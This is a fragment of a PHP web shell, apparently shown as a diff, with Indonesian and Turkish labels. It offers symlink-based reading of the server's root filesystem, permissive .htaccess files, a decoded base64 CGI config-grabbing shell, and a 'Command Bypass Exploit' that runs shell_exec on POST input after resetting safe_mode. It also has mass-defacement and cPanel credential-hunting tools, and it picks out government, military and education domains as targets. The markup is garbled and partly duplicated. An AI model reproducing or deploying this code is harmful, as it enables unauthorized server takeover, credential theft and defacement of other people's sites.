Password Hash | |
---|---|
Input here : | '; +echo ''; +echo ''; +echo ' |
Hasil Hash | |
Original Password | |
MD5 | |
MD4 | |
MD5 with Salt | |
MD5 with Salt & Sha1 | |
Sha1 | |
Sha256 | |
Sha1 with Salt | |
Sha1 with Salt & MD5 |
Symlink Server
";
+
+@mkdir('shu',0777);
+$htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
+$write =@fopen ('shu/.htaccess','w');
+fwrite($write ,$htaccess);
+@symlink('/','shu/root');
+$filelocation = basename(__FILE__);
+$read_named_conf = @file('/etc/named.conf');
+if(!$read_named_conf)
+{
+echo "
";
+
+}
+
+// config grabber
+elseif(isset($_GET['x']) && ($_GET['x'] == 'config'))
+{
+?>
+
+
+
ConfKiller
"; + + mkdir('pwnz', 0755); + chdir('pwnz'); + $kokdosya = ".htaccess"; + $dosya_adi = "$kokdosya"; + $dosya = fopen ($dosya_adi , 'w') or die ("Error Bajingan !!!"); + $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI + +AddType application/x-httpd-cgi .cpc + +AddHandler cgi-script .cc +AddHandler cgi-script .cc"; + fwrite ( $dosya , $metin ) ; + fclose ($dosya); + +$file = fopen("grab.cc" ,"w+"); +$write = fwrite ($file ,base64_decode($configshell)); +fclose($file); + chmod("grab.cc",0755); + echo " + ";
+}
+///////////////////////////////////////////////////////
+elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass'))
+{
+?>
+
+
+
Command Bypass Exploit
+"; +print_r(' +
+root@inori:~#
+
+Menu Bypass :
+
+
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]);
+$liz0zim=shell_exec($_POST[liz0]);
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "
"; }
+
+////////////////////////////////////////////////////////
+elseif(isset($_GET['x']) && ($_GET['x'] == 'domain'))
+{
+?>
+# Cant access this file on server -> [ /etc/named.conf ]"; +} +else +{ +echo "
Domains | Users | symlink | "; +foreach($read_named_conf as $subject){ +if(eregi('zone',$subject)){ +preg_match_all('#zone "(.*)"#',$subject,$string); +flush(); +if(strlen(trim($string[1][0])) >2){ +$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); +$name = $UID['name'] ; +@symlink('/','nginx1337/root'); +$name = $string[1][0]; +$iran = '\.ir'; +$israel = '\.il'; +$indo = '\.id'; +$sg12 = '\.sg'; +$edu = '\.edu'; +$gov = '\.gov'; +$gose = '\.go'; +$gober = '\.gob'; +$mil1 = '\.mil'; +$mil2 = '\.mi'; +$malay = '\.my'; +$china = '\.cn'; +$japan = '\.jp'; +$austr = '\.au'; +$porn = '\.xxx'; +$as = '\.uk'; +$calfn = '\.ca'; + +if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) +or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]) +or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0]) +or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0])) +{ +$name = "
+ + | + ++'.$UID['name']." + | + ++Symlink + | + +
ConfKiller
"; + + mkdir('pwnz', 0755); + chdir('pwnz'); + $kokdosya = ".htaccess"; + $dosya_adi = "$kokdosya"; + $dosya = fopen ($dosya_adi , 'w') or die ("Error Bajingan !!!"); + $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI + +AddType application/x-httpd-cgi .cpc + +AddHandler cgi-script .cc +AddHandler cgi-script .cc"; + fwrite ( $dosya , $metin ) ; + fclose ($dosya); + +$file = fopen("grab.cc" ,"w+"); +$write = fwrite ($file ,base64_decode($configshell)); +fclose($file); + chmod("grab.cc",0755); + echo " +
Command Bypass Exploit
+"; +print_r(' +
+
"; + ""; + +echo $liz0; +echo $liz0zim; +echo "
Local Domain Viewer
';
+
+$file = @implode(@file("/etc/named.conf"));
+if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
+preg_match_all("#named/(.*?).db#",$file ,$r);
+$domains = array_unique($r[1]);
+//check();
+//if(isset($_GET['ShowAll']))
+{
+echo "
+
";
+ }
+
+echo '
';
+}
+
+
+
+//////////////////////////////////////////////////////
+elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
+{
+echo "[+] There are : [ ".count($domains)." ] Domain | |
Domain | User |
$domain | ".$user['name']." |
Mass Directory
"; +error_reporting(0);?> +
Folder | + |
file name | + | hacked code |
---|
+
+ + Done
";}}} +//////////////////////////////////////////// +elseif(isset($_GET['x']) && ($_GET['x'] == 'jembut')) + { + ?> +
"; + $ok++; + } + } + } + } + echo "
You Found $ok Cpanel by Shu"; + echo "
'; + $temp = trim($temp); + + $file5 = fopen("test.txt","w"); + fputs($file5,$temp); + fclose($file5); + +$htaccess = +'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh +aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp +biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk= +'; +$file = fopen(".htaccess","w+"); +$write = fwrite ($file ,base64_decode($htaccess)); + + $file = fopen("test.txt", "r") or exit("Unable to open file!"); + while(!feof($file)) + { + $s = fgets($file); + $matches = array(); + $t = preg_match('/\/(.*?)\:\//s', $s, $matches); + $matches = str_replace("home/","",$matches[1]); + if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + syml($matches,$matches); + } + fclose($file); + echo ""; + unlink("test.txt"); + echo "
+ | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
+
|